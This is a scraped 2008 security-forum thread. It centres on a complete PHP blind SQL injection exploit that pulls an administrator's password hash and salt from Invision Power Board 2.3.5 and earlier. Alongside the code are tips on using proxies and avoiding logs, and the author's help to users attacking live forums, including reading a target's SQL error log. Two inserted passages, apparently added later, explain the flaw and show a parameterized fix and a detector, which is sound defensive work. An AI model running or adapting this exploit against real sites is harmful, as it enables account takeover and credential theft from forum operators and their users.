Waraxe IT Security Portal
November 14, 2019
www.waraxe.us Forum Index -> Invision Power Board -> IPB <= 2.3.5 sql injection hash/salt fetching exploit
Posted: Sun Oct 05, 2008 7:19 am
SnIpEr (Active user, joined Sep 25, 2008, 37 posts)
Well here's the problem. I know how to run it now, but I keep getting this error:

Anyone know how to fix this?
Posted: Tue Oct 07, 2008 6:20 pm
mairh (Beginner, joined Oct 07, 2008, 1 post)
Guys, because I am a noob, can you tell me how I can use that exploit?
Re: IPB <= 2.3.5 sql injection hash/salt fetching exploit
Posted: Thu Oct 16, 2008 1:35 am
devildavid (Regular user, joined Oct 16, 2008, 6 posts)
waraxe wrote:
Based on DarkFig's excellent advisory. Easy to use, fast and usually does leave minimal log traces.

Feedback is welcome!

[[update]] ==> version 1.1 with Curl autoload!

Code:

<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB <= 2.3.5 sql injection exploit
// Version 1.1
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 22. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$url = 'http://localhost/ipb.2.3.5/';
$id = 1;// ID of the target user, default value "1" is admin's ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//======================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
//=====================================================================
///////////////////////////////////////////////////////////////////////
if(!extension_loaded('curl'))
{
   if(!dl('php_curl.dll'))
   {
      die("Curl extension not loaded!\n Fatal exit ...\n");
   }
   else
   {
      echo "Curl loading success\n";
   }
}
//=====================================================================
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
   if(!isset($_REQUEST['wtf-is-cli']))
   {
      echo "<html><head><title>Attention!</title></head>\n";
      echo "<body><br /><br /><center>\n";
      echo "<h1>Warning!</h1>\n";
      echo "This exploit is meant to be used as php CLI script!<br />\n";
      echo "More information:<br />\n";
      echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
      echo "Still, you can try to run it from webserver.<br />\n";
      echo "Just press the button below and prepare for long waiting<br />\n";
      echo "And learn to use php CLI next time, please ...<br />\n";
      echo "<form method=\"get\">\n";
      echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
      echo "</form>\n";
      echo "</center></body></html>\n";
      exit;
   }
   else
   {
      // Let's try to maximize our chances without CLI
      @set_time_limit(0);
   }
}
//=====================================================================
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");

$hash = get_hash();
$salt = get_salt();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");
add_line("Salt: $salt");
add_line("------------------------------------------");

xecho("\n------------------------------------------\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");

xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
   global $url;
   
   $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
   $buff = trim(make_post($url, $post, '', $url));
   if($buff !== 'found')
   {
      die('Invalid response, target URL not valid? Exiting ...');
   }
}
//////////////////////////////////////////////////////////////////////
function test_target_id()
{
   global $url, $prefix, $id;
   
   $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
   if(!test_condition($post))
   {
      die('Invalid response, target ID not valid? Exiting ...');
   }
}
///////////////////////////////////////////////////////////////////////
function get_salt()
{
   $len = 5;
   $out = '';
   
   xecho("Finding salt ...\n");
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_saltchar($i);
      xecho("Got pos $i --> $ch\n");
      $out .= "$ch";
      xecho("Current salt: $out \n");
   }
   
   xecho("\nFinal salt: $out\n\n");
   
   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos)
{
   global $prefix, $id;

   $char = '';
   $min = 32;
   $max = 128;
   $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $post = $pattern . "=$max";
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
      
      $half = intval(floor($area / 2));
      $curr = $min + $half;
      
      $post = $pattern . '%253e' . $curr;
      
      $bigger = test_condition($post);
      
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      xecho("Current test: $curr-$max-$min\n");
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
   $len = 32;
   $out = '';
   
   xecho("Finding hash ...\n");
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_hashchar($i);
      xecho("Got pos $i --> $ch\n");
      $out .= "$ch";
      xecho("Current hash: $out \n");
   }
   
   xecho("\nFinal hash: $out\n\n");
   
   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos)
{
   global $prefix, $id;

   $char = '';
   $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";

   // First let's determine, if it's number or letter
   $post = $pattern . '%253e57';
   $letter = test_condition($post);
   
   if($letter)
   {
      $min = 97;
      $max = 102;
      xecho("Char to find is [a-f]\n");
   }
   else
   {
      $min = 48;
      $max = 57;
      xecho("Char to find is [0-9]\n");
   }

   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $post = $pattern . "=$max";
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
      
      $half = intval(floor($area / 2));
      $curr = $min + $half;
      
      $post = $pattern . '%253e' . $curr;
      
      $bigger = test_condition($post);
      
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      xecho("Current test: $curr-$max-$min\n");
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
   global $url;
   
   $bret = false;
   $maxtry = 10;
   $try = 1;
      
   $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
   $post = sprintf($pattern, $p);
   
   while(1)
   {
      $buff = trim(make_post($url, $post, '', $url));

      if($buff === 'found')
      {
         $bret = true;
         break;
      }
      elseif($buff === 'notfound')
      {
         break;
      }
      elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
      {
         die("Sql error! Wrong prefix?\nExiting ... ");
      }
      else
      {
         xecho("test_condition() - try $try - invalid return value ...\n");
         $try ++;
         if($try > $maxtry)
         {
            die("Too many tries - exiting ...\n");
         }
         else
         {
            xecho("Trying again - try $try ...\n");
         }
      }
   }
   
   return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt ($ch, CURLOPT_URL, $url);
   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
   
   if(!empty($GLOBALS['proxy_ip_port']))
   {
      curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
      
      if(!empty($GLOBALS['proxy_user_password']))
      {
         curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
      }
   }
   
   if(!empty($cookie))
   {
      curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt ($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt ($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt ($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   
   return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
   global $outfile;
   
   $line .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $line);
   fclose($fh);
   
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
   if($GLOBALS['cli'])
   {
      echo "$line";
   }
   else
   {
      $line = nl2br(htmlspecialchars($line));
      echo "$line";
   }
}
//////////////////////////////////////////////////////////////////////
?>

Still I don't understand how to use the exploit. Any deeper explanation?
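The URL pretest in test_target_url() of the script quoted above works because the display-name check splices the name parameter into SQL text, so a probe ending in ' OR 1=1-- makes the query match any row and the page answers "found"; a lone stray quote instead produces a database error page ("IPS Driver Error"), and test_condition() treats both outcomes as signals. The example below is added here and is not code from this thread or from IPB: the members table, its column names and the second decode step (app_decode) are assumptions that reproduce the shape of the bug, not IPB's implementation. It puts the vulnerable pattern beside its parameterized form on an in-memory SQLite table; the hardened function answers "notfound" to the same probe and returns no error for a bare quote, which closes both the boolean oracle and the error oracle the script depends on.

```python
import sqlite3
from urllib.parse import unquote

# Constructed in-memory stand-in for a forum members table (assumed schema,
# not IPB's).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (member_id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)",
                     [(1, "admin"), (2, "alice")])
    conn.commit()
    return conn


def app_decode(raw_param):
    """Hypothetical second URL-decode inside the application (assumption).

    The web server already decoded the POST body once, so a value sent as
    %2527 arrives here as %27; a further unquote() turns it into a bare quote.
    That extra decode is why the script's payloads are double-encoded.
    """
    return unquote(raw_param)


def check_display_name_vulnerable(conn, raw_param):
    """Vulnerable shape: the decoded name is pasted into the SQL string."""
    name = app_decode(raw_param)
    sql = "SELECT 1 FROM members WHERE name='%s'" % name
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        # A broken query surfaces as an error page, which is itself an oracle.
        return "error"
    return "found" if row else "notfound"


def check_display_name_hardened(conn, raw_param):
    """Hardened shape: the name travels as a bound parameter and can never
    change the structure of the query, however many quotes it contains."""
    name = app_decode(raw_param)
    row = conn.execute("SELECT 1 FROM members WHERE name=?", (name,)).fetchone()
    return "found" if row else "notfound"


# The probe test_target_url() sends, as it looks after the web server's
# single decode (%2527 -> %27).
PROBE = "somethingfoobarkind%27 OR 1=1-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", check_display_name_vulnerable(db, PROBE))  # found
    print("hardened:  ", check_display_name_hardened(db, PROBE))    # notfound
    print("lone quote, vulnerable:", check_display_name_vulnerable(db, "x%27"))  # error
    print("lone quote, hardened:  ", check_display_name_hardened(db, "x%27"))    # notfound
```

The hardened version still tells a caller whether a display name exists, which is the feature's purpose; what it no longer does is let the name parameter ask questions about other columns or other tables, and it no longer distinguishes malformed input by failing.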
Posted: Sun Oct 19, 2008 9:20 am
CygniX (Beginner, joined Oct 19, 2008, 3 posts)
Weird error. I get this every time: what's with this? I have tested the forum, and the IPS error thrown up means that it's vulnerable. But this output = whyyyy?

Code:
Target: http://someforum
Sql table prefix: ibf_
Testing target URL ...
Target URL seems to be valid

Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402

Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403

Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404

Notice: Undefined variable: i in /home/ryu/public_html/ipbsingleuser.php on line 102

Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402

Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403

Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404

------------------------------------------
User ID: 163376
Hash: ffffffffffffffffffffffffffffffff
Salt:
------------------------------------------

Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402

Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403

Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404

Questions and feedback - http://www.waraxe.us/
See ya! :)
Posted: Sun Oct 19, 2008 11:15 am
waraxe (Site admin, joined May 11, 2004, 2407 posts, Estonia, Tartu)
As the error message says, the script does not have write permissions in the current directory. So you can just disable the logging functionality by commenting out some lines in the php code.
Posted: Sun Oct 19, 2008 1:48 pm
CygniX (Beginner, joined Oct 19, 2008, 3 posts)
How about the wrong hash and salt given?
Posted: Sun Oct 19, 2008 2:05 pm
waraxe (Site admin, joined May 11, 2004, 2407 posts, Estonia, Tartu)
CygniX wrote:
How about the wrong hash and salt given?

Well, my script makes two prechecks, one for the URL and one for the user ID, and if one of them fails, then execution is stopped. So this seems to be some kind of patch or custom IPB code modification which makes the exploit pass the pretests and then fail hash fetching.
If you are sure that the target is still vulnerable (can you produce an sql error?), then you need to manually make blind sql injection tests and find out possible exploitability. Maybe you need your own custom exploit, or just try to modify the original exploit so it will work.
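waraxe's reply above says what is left is manual blind SQL injection testing; from the defender's side, that test traffic is the signal to look for. The script's header notes that everything goes through POST, which a default access log does not record, so the added example below (mine, not from this thread) assumes request bodies are being captured, for instance by a WAF audit log, and runs a small detector over constructed sample records modelled on the payload shape in the script. It URL-decodes each name value until it stops changing, because the payloads are double-encoded (%2527 becomes %27 and then a quote, so a single decode followed by a quote filter misses them), matches the decoded value against a few signatures, and counts hits per client so a run of probes from one address raises an alert.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote

# Constructed sample of captured POST bodies as (client IP, body). The three
# entries from 203.0.113.7 mirror the URL pretest and two character probes of
# the script above; the other two are ordinary display-name checks.
SAMPLE_REQUESTS = [
    ("203.0.113.7", "act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- "),
    ("203.0.113.7", "act=xmlout&do=check-display-name&name=%2527 OR 1=%2522%2527%2522 UNION SELECT 1,1 FROM ibf_members_converge WHERE converge_id=1 AND ORD(SUBSTR(converge_pass_hash,1,1))%253e57 OR 1=%2522%2527%2522-- "),
    ("203.0.113.7", "act=xmlout&do=check-display-name&name=%2527 OR 1=%2522%2527%2522 UNION SELECT 1,1 FROM ibf_members_converge WHERE converge_id=1 AND ORD(SUBSTR(converge_pass_hash,1,1))=102 OR 1=%2522%2527%2522-- "),
    ("198.51.100.4", "act=xmlout&do=check-display-name&name=alice"),
    ("198.51.100.4", "act=xmlout&do=check-display-name&name=O%27Brien"),
]

# Signatures are applied to the fully decoded value, so encoding depth does
# not matter. A legitimate apostrophe (O'Brien) hits none of them.
SIGNATURES = {
    "tautology": re.compile(r"'\s*OR\s+1\s*=", re.I),
    "union_select": re.compile(r"\bUNION\s+SELECT\b", re.I),
    "char_oracle": re.compile(r"\bORD\s*\(\s*SUBSTR\s*\(", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}


def full_decode(value, max_rounds=5):
    """URL-decode until the string stops changing (bounded to avoid loops)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(body):
    """Return the signature names hit by the decoded 'name' parameter of a
    check-display-name request; an empty list means nothing suspicious."""
    params = parse_qs(body, keep_blank_values=True)   # one decode, like the web server
    if params.get("do") != ["check-display-name"]:
        return []
    name = full_decode(params.get("name", [""])[0])   # the application's extra decode(s)
    return [label for label, rx in SIGNATURES.items() if rx.search(name)]


def per_client_hits(requests):
    """Count flagged requests per client IP."""
    hits = Counter()
    for ip, body in requests:
        if classify(body):
            hits[ip] += 1
    return dict(hits)


def alerts(requests, threshold=2):
    """Client IPs with at least `threshold` flagged requests. A full hash and
    salt fetch with this script takes well over a hundred probes, so even a
    low threshold separates it from a user mistyping a name."""
    return sorted(ip for ip, n in per_client_hits(requests).items() if n >= threshold)


if __name__ == "__main__":
    for ip, body in SAMPLE_REQUESTS:
        print(ip, classify(body))
    print("alert:", alerts(SAMPLE_REQUESTS))
```

The per-client count is the part worth keeping even if the signatures age: the technique needs one request per comparison, so a burst of display-name checks from one address within a short window is anomalous on its own, whatever the payload looks like.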
Posted: Mon Oct 20, 2008 12:46 am
CygniX (Beginner, joined Oct 19, 2008, 3 posts)
Oh. Ok, thanks!

I'll try that.
Posted: Sun Oct 26, 2008 7:09 pm
mattoni (Active user, joined Oct 26, 2008, 34 posts, United Kingdom)
Does that mean it's already patched?
Posted: Wed Nov 05, 2008 6:59 pm
charlis (Beginner, joined Nov 05, 2008, 1 post)
Sql table prefix: ibf_
Testing target URL ...
Target URL seems to be valid
Testing ID 1
ID 1 not valid, passing ...
Testing ID 2
ID 2 validated
Finding hash ...
Sql error! Wrong prefix?

It looks like the prefix is working.
Then maybe the site is patched? (It passed admin.) Any way to deal with an already patched site? Or just the wrong prefix? If so, any way to get the prefix?


Thanks.
Posted: Wed Nov 05, 2008 8:32 pm
waraxe (Site admin, joined May 11, 2004, 2407 posts, Estonia, Tartu)
Probably the wrong prefix. You can try to look at the sql error log:

Code:

http://***/cache/sql_error_log_09_24_08.cgi


Just use the current date in the file name.
And ... some servers show cgi files as plain text, but others will give you error 500 or 403 ...

Another option is to either bruteforce the prefix or use information_schema. But it means that you have to add additional functionality to the exploit.
Posted: Tue Nov 11, 2008 2:37 pm
wUK (Beginner, joined Nov 11, 2008, 2 posts)
I get the following error when trying this:

Quote:
The application has failed to start because php4tl.dll was not found.

I didn't have php_curl.dll to start with but found it online so I'm guessing that's not the way.
Posted: Wed Nov 12, 2008 1:54 am
_mranderson_ (Valuable expert, joined Oct 30, 2008, 51 posts)
Google curl, download and install it, it's that easy.
Posted: Sat Dec 13, 2008 11:07 am
almostwOw (Beginner, joined Dec 10, 2008, 4 posts)
Can you teach me how to use this script or something?

I'm a noob.
Posted: Sat Dec 13, 2008 3:03 pm
gyan007 (Advanced user, joined Oct 17, 2008, 106 posts)
almostwOw wrote:
Can you teach me how to use this script or something?

I'm a noob.

Google "executing php script". The exploit is php.
Page 4 of 5
Powered by phpBB 2001-2008 phpBB Group
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"